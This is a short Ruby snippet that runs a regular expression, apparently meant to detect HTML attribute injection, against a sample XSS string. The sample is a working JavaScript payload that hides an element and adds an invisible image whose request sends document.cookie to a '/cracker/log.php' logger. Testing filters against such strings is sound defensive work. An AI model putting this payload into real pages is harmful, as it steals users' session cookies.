re = /(?:[\s\/"]+[-\w\/\\\*]+\s*=.+(?:\/\s*>))/
str = 'this.style.display=\'none\';this.insertAdjacentHTML(\'afterend\',\'<img src="/cracker/log.php?cookie=\'+encodeURIComponent(document.cookie)+\'" style="display:none" />\');'
# Print the match result
str.match(re) do |match|
puts match.to_s
end